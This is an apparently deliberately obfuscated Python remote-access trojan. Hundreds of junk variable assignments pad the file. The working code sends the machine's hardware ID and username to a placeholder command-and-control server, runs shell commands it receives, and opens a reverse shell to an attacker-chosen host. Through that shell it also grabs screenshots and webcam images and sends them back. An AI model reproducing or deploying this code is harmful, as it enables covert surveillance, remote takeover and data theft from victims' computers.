aaAaaaaAAaaAAaaaaaaAaAaAAaAaAaAAAaaAaAAAaaAaAAAaAAAAaAAAaAaaAAAAAaaAAaaAAAAaaaaAaAaAAaaAaaAAAAAaAaaAAaAAAAAAaaaaAAAaaAAAaAaAAaAaaaAAaaAaAaaaaAAAAAaaaAaAaaaAaAAAaAAAAaAaaAAaaAaAAaAaaAaAaAaaAAAaAAaAAAAaaaaAaAAAAAAaAAaAAAaAAAaaaAAAaaAaAAAaAAAAaAAaAaAA = "UGSvxuSBmlEdISMMTbgBKfeBiPofyLgrrntSfkCwJAjLJrQGfrNVCJnqdEznKKkgaFMLjTXQcaYPqZx"
f16833301916687021246 = "OElilOTswqEhHFcDzYLVBHUNDhoPIwWraKgqNaDfRskuAYHmKLthSHUsqbynHQrSSFBYSUuYmcECZhl"
IIlIlIlIlIlllllIllIIllIIlIIlIIIlIIIIlIIlIllIIlIlIIIIIIlIIlIlllllIlIlIIIIIllIIIIllIIIIlIlllIIlIlIIIIllIIIlIlIlllllIIIIIlIlIlIIIlIIllIllllIIIlIlIIIlIllIIIIIIlIlIIIIllIIIllIIlIlIIIIIlllIIIIIlIIIllIIlIIIllIllllIlIlIlIIIllIIIlIIlIIlllIlIIIIllIIIllII = 262
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = 323
AAaaAAaAaAaaAAaaaaaaaAAaaAAaaAaaAAaaAAaAaaAAaAaaAAAAAAaAAAaaaAAAaaaaAAaAaAaaAAaAAaAAaAAAaaAaAAAaAaAAAAaAAAAaAaAaaaaAAAaaaAaaaAaaaAAaaAAaaaaaAaAAAAaaAAAAaAAAaAaaAaaAaAAaaaAAAaAAAaaAAaaaAAaaaaaAAAaaaaAaaaaaAAAAaaAaAaaaAaaaaaaAaAAAaAaaAAAAaAAa = 250
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = 600
rIdIMnjGWiDqJEOWgzOEcUsMLPZDmQwyPadGMDUsVEcEOFsncgcTsqefKOYfeswuekNwLpCLqekgVKK236 = 406
HVklhuOIhiDspOjGWvHTYiUidvyoJAzTlZnibdRuwLniNPQUluTcAGsHyPOhkmfVXfgFJdgGoDDgSsS234 = 504
cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc = "FnSJHFYAiaMuUGnhDSJtNTFpzcwAlZppXanFqKcZjCgxYqVFVwTAazHsUGPtTKRyNQAagOYxPLjoTjE"
pLuytsQcMKcKJlxFYRAjaGxiWiDFzyrxTQoMmlHXvzCYprrXPHJkoWguooddwzgOIysLwbilGkWavgN230 = "XjrlZkGvVdDqFiVNPmevCachSvURCFkPbhgxQAxJWYwtMrSDxchlUzxRqclAqVqzTsgXyRVXYEohbFe"
n16833301916667018228 = "NsZaKrJFqXYpYSOfrTXCuFcuYxztVibcswJNNrJgAdQmZANzQVhoWRkGQbvmdJbjIZFZRLTfjdmKTBH"
n16833301916667018226 = 164
SqtDCccdPtGJbsUondazkAbTbvhilpDnkYhDFqNykXNkLcJcNZsYJQJExXMDevAGiqcgDhMqGZswtnR224 = "uVJztLUrzfMmSmfzFBTITAEnkUWRKRbGzDBDXQNvSBcgySOBjKDRSiRwITnYdCczLngxZUWXkHcwrIq"
AaaaAaaAaaaaAaaaAaAAAAaaaAAaaaAAAaaaAaAAaaAAAaaaAAaaAaaAaAaaAAaAaaAaaaAaAaaaaaaAAaaaAAaAaaAaaAaAaAaaaAaaAAAaaaAAaaaaAaAaAAAAAAAAaAAaaAaaaaAaaAAaaaaAaAaaaAAAaAAaaAAAAaAaaAAAaaaaaAAaaaaAAaaaAAaaAAaaaAAaaaAaaaAaaaaaaaaAAAaAAA = 376
TyRAZpywgplYUoIhebRxLejYrvJdyPNukviOKiMeRrAhpaOZgeWVUaXxHwxFuiCBJYSCOeLaiOdUkWB220 = "ktlCXmqfISLHdsPtkRwNiVGPCjQrOJBgJzErlkMTLcKagcoOqMfouZHbPUnoNsMCjLSUaydghUmxkFp"
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 512
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj = "GpZtYZmIfsRKpAbSVgkhVpLxvhamXLzkKUfsaIKpBlGIgCLwgwoickyNLjhXsBzdIoHPfMVAaENMBly"
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII = "cUTkZQUmogZHEEaBzleYpqqVMvchEVXWWuTrmSNWCEVkrQyzUyrGKFxSGqpCrKDCMSidDmSRLaYlHvH"
IlIIIllllIllIlIIllllIllllIIllIlIlIllIllIlIIIllIlIlllllIIllllIIllIIlIlllIlIlIIIllIIllIlIIIIlIllIlllllllIlllIIIlIIlIlllIIlIlIIlllllIlIlIIllIIllIIIllIlIIlIlllIllIlIlIlllIllIllIlllIIIIIllllIllIlIllIIIIllIIllIIlIIlIlI = 368
aaaAAAaaaAaaAAAAaaaaAAAAaaaAAaAaAAaaaaaaaaAAaAAaAAAaAaAaaaAAAaAaaaaaAAaaAaaAAAaaAaaAaAaAAaaaaAaaAAAaaAaAAAAAAAAaAaAAaAAAAAAaaAaaaaaAaaAaAaAAAaAaAaaaaaAAAAAAaaAAaaaaaaAaAAaaaAaaaaAaAAaaaAAaaAaaaAAAAaAaaAAAAaAAAa = "yaTkwoLBBAzunUEfApRKHLxIXKwVTlwGGeXoMlVpFBnmnKmgxRwrXNCncVoMaruOWscTUYUMZWupOdz"
L208 = 539
M206 = "YmIZUWYIduzhEpYPucHswlSgGlIsoyWmKVkiwTsfMRbOZuDYFGpcmgZYPUVQwYjXjEDLutHMCtiskME"
llIIlIlIllllIIllIllIlIIlllIIIIIlIIlIIIIIIIIlIlIIlIllllIlIlIIlIlIIIlIIIlIlllIIlIllIIIIIlllIlllIIIllIllllIllllllIIIllllIlIIlIllIIllIllIllIllIIlIIlllIIlIIlIlIlIlIllIIIlIlIllllllIIIIllllllIlllIIIIlIIlIIIIlllI = 430
J1683330191665708202 = "ZmFCRNXuuRFZVTxVSIZopeUZnnLjTQdPHkUsvdsdadpZfiRDFrqJPxTgBnyAMGiToWXUoMJIrpUBoBL"
QAIehgEekNdYhgKNmcJMatHCUSGBpIwarGjGGtRitVupAKHzdBcpOcPoHcPTHUaNJZYJuZHjshmpYyM200 = "CtmMDWhvHjdSNSaRoVvJErFvaJqrcZPsWNgCLGMRaBhxnUwsXeRtoqCmQBOMsTiekdnhvPeMZNjUszJ"
PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP = 174
U1683330191665708196 = "VcLCxkSMmVXRVhXJiuBziRSpFXMtRpUdsSBZMUGFZBcKpJcbBHjldQyjOjXmzcOWviXhJwdllHrzuPx"
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu = 154
GHaFukTnnIYobkEeOcgzDKOmeWNYrbdlGwYdqjveIiOxTfwbVBeGJOKZlADPHqHHLXwBCWeBiAgLmlo192 = "WWuXQDCMqMtHWimaDaUauplsLgDZTKxRmkDNkMQrGIdNzJCyiLwRFUKjERoozrWhZwKsUytEMqUuiwJ"
x1683330191665708190 = "ewyhIUIiTsQNmHpVPchOrwMYpMoFEHOayhpOpAKVGXwyZOaEwMWYnbFoPdcFhPCIAjQONDKrYNPVoOh"
S188 = "BWAnCoTDPztdKbgdAKIqqmltDLviyBofgzpRdfOqlJyUgjoNfSPAhXGmOMRtATDGpzFEsMKkHChcPQP"
H16833301916647015186 = 241
AaAAAaaAAAAAAaaAaAaAAaaaAAaAAAaAaAaaaAAAaaaAAAaAaAaAAaAAaAAAaAaAaaAaAaaaaAaAAAaaAAaAaAAAaaaAaaaAAaaaaAAaaAaaAaAaaaaaAAaAAaaaAAAaaaAaaAaaaaaAAaAaAAaAaAAaaaAAaAAAaaaaaaAaAaaaAAaAAAAaaaaa = 332
P16833301916647015182 = "XZLDUFYzDQGrldDVhjsWBrmuOvYhSDtXfKkGddyhGoYiuNmctSWBmZClEmqeAvwvzwFNDNneBYzaESf"
AVXMXwIZHDcInfSLouhhwmyDbhfdypPknkNtGgjQOOtghOOlLDGEtQqXaNsqMiitADRyemDHsAbBhuE180 = "dNbYibhaitAXNVOXvJGYozYOvRVEZUkyMiyIAbGQUsHSrzQyQLgAOURVRlqPMMIveKotRuvuFVVHfti"
y178 = 808
lllIlIllllIllIlllllllIlIIIlIlllIIIIllIlllIlIIlIIlIIllIllllIIlllllIllIIlIllllIIIlIIIlIIIllIlIlIlIllIlIIIlIllIIIlIllIIlIllIlIllIllllIIIlIllIlIIIllIIIlIIIllIlllllIllIllllllIllIllI = "GDQMDnxGwnLudiLuPgfqeYzdIhzSwqtweVyTGmZJyqFbEMLwbEPgtLfPUdMMZzAHnrPOVlmhbSzABHy"
AaaAaAAAAAaaaaaAaaAAAAAaaaAAAaAAAaAaAAaAaaaAAAaaAAaaaAAaAAaAaAAAAAAAAAAAAAaAAaaAaaAaaaAAAAAAAAAaaaAaAaAaaAAAaAaAAaaaAaAAAAAAAaAAAAAaaAaaaaaAaaaAaaaAaaaaaaAaaaaaAAAAaaaAaAaaAa = 266
n172 = "KtBdFFEnaCqhPCgphDBFSwtWMrKYldUgOCaKEqRBWCIhENdwNyiwemBcbGVMgmrZTcBLdPruRQTyJAu"
v170 = 252
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu = 330
Q16833301916637027166 = 858
F16833301916637027164 = 524
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd = "kVsSFbbHbIjsYsWnWvTvcXWhqkVbWICZgBsKYMbxkfxNKmKrgJFyMNvssijLEwnjcwrzfXdEjjOGRSO"
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM = 409
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = 251
N156 = "mAYpzvLRPfOBfobUEmzyOigbPHOzeMwHvktjEAAXrLfyWIQJDZZlTLuyQhXlhUqqJLwkdfmhbbdIXaG"
IIIIIIIlIlIlIlllIIIllllIllIIlIlIlIIIIIlIIIIIIlllllIllIIIIllllllllllIlllIllIlllIllllllllIIlllIIlIIIIIIllIIlIlIIIIIlIIIIllIIIIIlllIllllIIIlIlllIlIlIlIlIIlll = 547
nNGxlzTZDHJKEeJWmLHqVqqSoUmrJJuVaVDHdGlPufEXKYgbPWyWvMVbrVBBcypemjrCVMekTmHlqza152 = 211
Y16833301916627016150 = 105
m16833301916627016148 = 57
UEkZajJvuUXmWNkybfBdZqswkBDQenXlhpgzXWWcFTLtxiaAIVwALvYLJzpZwPyhNRWOdPccwHVXLGf146 = "GROJxGsjpYmRHgtAnNUtSHfIjRTFsDbKZEaSHiJTjoHWvvOejjeQRKduPgqYcsddQHUAaQAZKXcaFca"
PhPgmjhJvUwbvWuAGItLpcNNUnbEbaLZkmUgLKBfkZLktWQchuRPMAWobjDEIcQbFYtSOBiLqGNLUHS144 = "UzFGQLyFaQKYswBAINealUgBRuWtTsgOalScjPbNnvLFDlMylFJgnyHCnsxtVYiBxwYiYFvYJmnnchy"
IWrYrRJsOxkMbflrvQlzybuzHFuishCEgMgJRxxxZUjkxEpPAosMOsLmOhjRgxEuislPDbgqNMSgBRZ142 = 173
tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt = "DoqtfXGiGeaHgfjibboZQAcRGGeNqCwLDVzledKUAiKfsGSfthefjriEvBAKeiaRoxwCMfWYTTkAhaL"
t16833301916627016138 = "YecaxJdjyDphmIyVMdyOGJrXqpEsuokoxCMSENTzwggQuTwWdzgAwxbUPRJmXumbaQHtYeWcXgPCKoU"
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp = "slXAHcUydkKiOweydlgetRujPoZFoZneSEaynKOqGXTGhWzlQnQIrxkDflobApFdZMkTSFXqpVwyiLB"
G134 = "MAlpOoajUiguOeifPDKsHHshymPqsxltEinbDDcejGCJtJjzUNpCFqQnQlOpNXtZHQEOesZonYVHEQm"
IIIllIIllIIIIllIIllIlIIIIIIIllIlIIIIlIllIIlIIllllIllIlllllIIlIIIIlIIlIIllIlllIlIIlIllIlllllIlIIlIIlIIIllIIIllIlIIIIIIIlIllIIIIllIlll = 436
V16833301916617014130 = "eqhJLsryjLnbQgxIXRxocvVrbwWLcFaepdZYrTSFchLjxTWtmnNqeYfwaaQTqDrUdhWLVcwUnWOZwCX"
j16833301916617014128 = 297
I16833301916617014126 = 708
S124 = 675
IIlIIIIIIIlllIIIIlIIllIlIIlIlIllIIIlIllllIIlIIlIlIlllIIIIIIIIlllIIIIlIlllIIIlIIIIIlIIlllIlIIIlIllIlIIIIlIIlIIllIIllIlIIIlI = 196
aaAAAAaAAaaAAAAaAAAaaAAAAaAaAaaAaAAAAaAaaaaAAaAAAaAaaaAaaaAAAAaaAAaaaAAAAaAaaAAaaAaaAAAAaaaAaAaAAAaaAaAAaaaAaaaaAaaaAaAA = 580
F118 = 264
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm = "YoorkGrmqdHlPLCJINaVozBZQOcwAgvnLSyYNwdTeUpBHdByIDwceUZEMdcrHNbQZKhuVmUfQzPRqln"
AaaAaAaAaaaAaaAaaAAAAaaaAaAaaaaAaaAAaAaAAAAaAaaaAAaAaaaAAAaAAaaAAAaaAaaaAaaAAaaAAAaaaAAAaaAAaAAAaAaaaaAaAAAAaaAAaA = 279
J112 = 200
d1683330191660703110 = 478
IlllIllllIlIIllIIIIIIllIIllIllllIllIlIIllIllIlIlIIlIIlIlIIIIIllIllIIIIllIIlIlIlIlIllIIIlllllIlIllIIIllllIIIl = 275
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv = 491
tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt = 736
yVbzipAnsmclKPUbOHYLZCOcfgPDTIQpJDlxowCiDCpqMutWtPKjPNnAFsSbeiJinVEebMotwGjxewf102 = 354
llIIIIIlIIIllIllllIIIllIIllIlllIIlIIIIlIlIIIllIIIlIIIIIllIIllIIIllIlllIIIIIIlllIllIlIIIlIIlIIlllIlll = 296
c168333019166070398 = 937
AaaaAaAAAAaaAaAAaAAaAAAAAaAAaaAAAAAAAAaaAaAaaaaaaAAAAaAaAAAaaAAAaaAaaaaaaaaAaAaaAaaaAAAaaaaaaaAa = 417
Z94 = 744
WnZuExnvtqLxHEqbRKqtOkVeOfqlHfxInbIHhtjnSQPtPEAFPcjBqXQHMAEQquixDJjFslVJQsdcEVW92 = 483
w90 = "JzxTbuBUGNCVwMYRNhAxZvRAFNKslEXakcZoizoDzUkTGmplcLkmrKCGwEZOBtpCfyGiEsqxzaiXXce"
WppYuckoydzpmJReWppQXsfOvHfomvgkSEziDMldszrkcbenTzzfwecsaNFwkqRDByCWcqdbAhJkgnl88 = 419
g1683330191659702386 = "rxzvwhhBseGtkcInyRFKKsoXAHFNXQwzPDVvqqQVdGZSjsPfojOALwmhbWCOQSQIhtHLlwgzAObnxQP"
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj = 250
u1683330191659702382 = 245
wshnXFjQnejBghlHlLFcXpUrfwVpMNwVZkSPBqWQMcoeeBYDGSopoSLACpFeoUvbiAqsSUggvgBFtiq80 = "ritHEIwyaXpyuYZZLovHkUJuZHBplAGvnEBSNFDSdEDcoBTYWKliuMEwsRNwaymcSjBxsqyzINYwcRk"
AaAAAaAaAAaaAaaaAAAaaaaaaaaAaAaaAaAaaaAAAAaaAAaAaaaaAAaaaaaAAAAaAaaaaaAaAAaaAA = "yhRslkRKCWrHQMGJLEeSSRijJtfbrMPnSAyyTyTvyElcbovyfLnjgUicqCFPMRvoZEAALiDavzshGkm"
d1683330191659702376 = "mnKEciGeesynPwRfhrSBfDKajGjhUsltCtieAPHlGcikESbRzrmZJnWnbXCHQCCdEiQoeCzkirkTCZh"
s74 = "bSgZmOBQUWCHAyEdWbtKuixFestqwqGNhCbYNkVryOyPYseHJQfOReTArgStiodEwoAgkfjHiOMPDne"
AaAAAaAAAaaaAaaAAaaAAAaAAAAAaAAaaaaAaaAAaAAAaaAAAaAaaaAAaAaAaaAAAAaAaaaa = "ltghijGLGHDZZyuOCbNehwjDtDOBJxpeaEzVgaBAZTIzdPllkaHHKYJZoBpgqcLBlzCgUoWqHgtqQPJ"
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = 178
lIllllIIIIIllllIlIllIIIIIlIIllIlIIIlIIIlllIIlIllllIIIIIlIllIIIlIIlII = 398
aaaAaaAAAaAaaaAAaAaaAaaaaaaAAaaAAaAaaaaAAAaaaAAAaAAAAAAAAAaAaAaaaA = "ldXUNbFgBUBycmueqCvsOZpDxXnYZPnjdtxTCyhBUjCDDsxNTrUGqUYWUVxTzqVOvjCVLbfnEnvqFIX"
lIlllIIlIlIlIlllllllIlllIlllllllIlllIIllIIIIllllllIllIllIIIIllll = "hpogPpmWhMnvFoPZYVMYiIkSjuDVDbzDIeDbXFoavbFGdxGvUqMZzcLAYdxeJBsqodwejLLpZBFfNJC"
TiKvsJCEHcZDEAmiaVqYmUJrrHElgXBYQGodTBrtpXlGRZSvJINjIgAeGrqWdonwMOMsrQEOXAEqXHd62 = 303
I60 = 327
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh = "KusTvQryOVoNMfsGfIxnrnYUDWBfglgpCWRwzIcZNEnNzvZefLbdabnzZmYwtkvPvvFjZgUmDaCfNYM"
IlIIlIIlllIIIIlIlIllIIlIlllllIlIIIIIIIlIlIlIIlllIIIlIlll = 266
n1683330191658702154 = 743
f1683330191658702152 = 263
zYSibGOxzhUdlMkXmMsoeuldqrsxqwvTJXrkWycaIiPXLNSKczZCILkVACZavyKWNznDWjzOllVSXIW50 = 363
lIIlIIlIlllllIlIllllIllllIIIIIlIIIIlIllIlIIlIllI = "pLZfvexjwXVYKZiZTaEUiSuXJYHQobisGlcSuMYNAMQjIbYkfGRBKoSCpgVcIzkDPvNDNGauQQaUvjR"
AaaaaAaAAaaAaAaaaaaaaAaAAaAaaAAAAaAAAaaaAaAaaA = "wfIfpkOWKzMFByThVJAeqHoWSjMTDEGnnRyUQdbcfMCQzzjdQBkcFCpXusQWlDZquNqXDOpMFQWkliz"
tttttttttttttttttttttttttttttttttttttttttttt = "UKambseGQbhVktBuPJnhwmQMqDSdOKMnyrgyubejTdTMbbonYeOJNVDUJrdWxdMjpZKcQqnlgJiWAXx"
f168333019165770342 = 428
AAAAaAaaaaAaaAAaaAaAAAaaAAAAaAaAAAAaAAaa = "lDRoOEVWxGGneUaqlFKFPXHDtoKuqEKCGDqRAUzOXiMCXVcDwiQDLCAPRvoLjlhWbLeTAMfkjXQfavy"
AAAAAaaAAaaaAaaAAaAAAaAAAaaaaAaAaAaaAa = "DPiqgYhhExboTSxNRdGudCfVLqsUoQZHcxZGgSjrmYJMstADWTuIIHcNCSFPMngJPCQVlUNfmRZlvTW"
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = "mbFAaWvtOJyFrMBicHNGXYiXdhPkxUNUNRpVLjVaGYtFbAojXmlMLszMkhNbYzuJcyvlbEXZZdyuRwx"
I34 = "LXKoFjypVOLYdEqAxpvCjWmesbgyYbfdUmfGACSCFXjmbGURBqYjDMnHZxiyZSgKeXFFYxcdMWimBSq"
a32 = "NkGnMWXvtYfRYJxRnIzhKfEJIqcdTcYgtDdsjhgzuWGzIkIsXVdgnxNACIJMsWpYIuNnFstAVRtUtld"
k168333019165770330 = "jleMgjAPzhwlxUBryKOSvitQORkGIuKQMWOdqeIiwzaaWZCEwaRHarEyQLusHPiDvLWwYPPYlTAYZSl"
uuuuuuuuuuuuuuuuuuuuuuuuuuuu = "ICjEqeWHBJHNzACzUDpVUqUpBfNFyjFxytWKeprTneOJSSkgDOsZOeBNOSEikeQpWlYzsaFMgLrWWfJ"
aaaaaaaaaaaaaaaaaaaaaaaaaa = "OYuHvqNRubhNzuWTJSNCUXdPjCwQfOtUBTJvisWSoEmZeWdBFvHciNuktYrfYGGPlapRzqRAnNvLyfs"
aaAAAAAaaAAAaAaaaaAAAaAa = "RwqiKYfcrcqnnFLXwrrfQZljuOgeeJlVIUHXnIQpbhJCkIveuOCIzBbxoSTEjeVMFNJixXXdvRESZWJ"
eTeiSwvTaupjxwdEevWLIqTfOGQfGrYTPJyiySojKSETEmmVQyDSwxEqEqiwIVnHReGmQACtusOtTgg22 = "QgxHxjEtEqKfkOlkzdFuoDIbhXCaAFgonRQipgJJnXmqYUsVGLUZCsORWteNkUCcYTNpHoqPYUXVLfZ"
jSyVBBThvUMFyrUSBDQGpgHNlHlSxzprtNhUnKmijsrwvMtwrAAeHEVgsFAPaoeCsVpWghCrTnnlhYo20 = 672
AAaAaAaAaAaAAAAAAA = 168
lIIllIllllIIllII = 539
IIIIIlllIlIlll = "xdBIwzJjtdlyZCgWrZSDpXlPwzGdcngNHlvmNcPyIGgapqspbdNnWxdIecjKlTFvbojJNKvSLLMxAWd"
AaAAaaAAAaaa = "EBqbJvQBRwYwGOnAFkqIrzolHRxTKsdkTtPtGSQTEofgZggPvZbzUeezWDbvjuDIYLjyeWuYeNuQzrX"
IIllllIlIl = 441
A8 = 412
IIlIll = "GByiadnXSkcUZMpErBhmORwqSerOxxXaEkODYzRTPejNZURDpLYQeoMlGqKRmzFpZDlhLUChqjCAbOr"
aAaa = "UlzjXFBCVPNIRaLcJrxTXvVTMJwCwFOWKFAUiaNdUDTkDdlKstXPUMnBQZyPUgwusrNjcONmzXUIqcm"
VYNwuZUwAleRsUnnBRlrpkKTNkeHgXeuLHkFpHkVzwVWjTBVIcCCELTfPVPzIhtEDUgJVhEftiVFVoT2 = 241

import socket
import os
import subprocess
import requests
import time
import mss
import pygame, pygame.camera

X1 = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()

while True:
    time.sleep(60)
    try:
        d2 = requests.get("http://icanhazip.com").text.strip()
        requests.post("<YOUR 000webhost URL>/report.php", data={"hwid": X1, "username": os.getlogin(), "echo_reply":"n"})
        lIll = requests.get("<YOUR 000webhost URL>/commander.json")
        aAA = lIll.json()
        if aAA['echo']:
            if X1 in aAA['username'].split():
                fgiZNNUhymWipBoVIUmyhaYKvfevmXsyAzCQvGVdhrhleDQyPspwfNlwQpbXFTFYioyOJQOwonfNOYT6 = subprocess.getoutput(aAA['echo'])
                requests.post("<YOUR 000webhost URL>/report.php", data={"hwid": X1, "username": os.getlogin(), "echo_reply": fgiZNNUhymWipBoVIUmyhaYKvfevmXsyAzCQvGVdhrhleDQyPspwfNlwQpbXFTFYioyOJQOwonfNOYT6})
        if aAA['getin'] != X1: continue
        aAaaAAaA = aAA['hostname']
        aAaAaAaaa = int(aAA['port'])
        z10 = 1024 * 128

        u11 = "<sep>"
        oooooooooooo = socket.socket()
        oooooooooooo.connect((aAaaAAaA, aAaAaAaaa))
        AAAAAaaAaaAaA = os.getcwd()
        oooooooooooo.send(AAAAAaaAaaAaA.encode())
        while True:
            WWWWWWWWWWWWWW = oooooooooooo.recv(z10).decode()
            lIIIIIlIllllIIl = WWWWWWWWWWWWWW.split()
            if not WWWWWWWWWWWWWW: break
            if WWWWWWWWWWWWWW.lower() == "exit":
                break
            elif WWWWWWWWWWWWWW.lower() == "screenshot":
                with mss.mss() as sct:
                    e16 = sct.grab(sct.monitors[1])
                    DnxYIOkwhtkNeOSUlfwkQujpdhZaxWPMSzaSDdgjeyeNzlgnehAjRrSVztBfEVpeRZLcWQPtGOlDryS17 = mss.tools.to_png(e16.rgb, e16.size)
                    oooooooooooo.sendall(DnxYIOkwhtkNeOSUlfwkQujpdhZaxWPMSzaSDdgjeyeNzlgnehAjRrSVztBfEVpeRZLcWQPtGOlDryS17)
                    oooooooooooo.send(b"<END>")
                continue
            elif WWWWWWWWWWWWWW.lower() == "webcam":
                pygame.camera.init()
                J18 = pygame.camera.list_cameras()
                if J18:
                    llIIIllIlIlIllllIll = pygame.camera.Camera(J18[0], (640, 480))
                    llIIIllIlIlIllllIll.start()
                    time.sleep(0.5)
                    aaaAAAAAAAaAAAAaAAaA = llIIIllIlIlIllllIll.get_image()
                    llIIIllIlIlIllllIll.stop()
                    oooooooooooo.sendall(pygame.image.tostring(aaaAAAAAAAaAAAAaAAaA,"RGBA",False))
                    oooooooooooo.send(b"<END>")
                else:
                    oooooooooooo.send(b"<END>")
                continue
            if lIIIIIlIllllIIl[0].lower() == "cd":
                try:
                    os.chdir(' '.join(lIIIIIlIllllIIl[1:]))
                except FileNotFoundError as e:
                    fgiZNNUhymWipBoVIUmyhaYKvfevmXsyAzCQvGVdhrhleDQyPspwfNlwQpbXFTFYioyOJQOwonfNOYT6 = str(e)
                else:
                    fgiZNNUhymWipBoVIUmyhaYKvfevmXsyAzCQvGVdhrhleDQyPspwfNlwQpbXFTFYioyOJQOwonfNOYT6 = ""
            else:
                fgiZNNUhymWipBoVIUmyhaYKvfevmXsyAzCQvGVdhrhleDQyPspwfNlwQpbXFTFYioyOJQOwonfNOYT6 = subprocess.getoutput(WWWWWWWWWWWWWW)
            AAAAAaaAaaAaA = os.getcwd()
            NNNNNNNNNNNNNNNNNNNNNNNNN = f"{fgiZNNUhymWipBoVIUmyhaYKvfevmXsyAzCQvGVdhrhleDQyPspwfNlwQpbXFTFYioyOJQOwonfNOYT6}{u11}{AAAAAaaAaaAaA}"
            oooooooooooo.send(NNNNNNNNNNNNNNNNNNNNNNNNN.encode())
        oooooooooooo.close()
        time.sleep(20)
    except Exception as e: print(e)

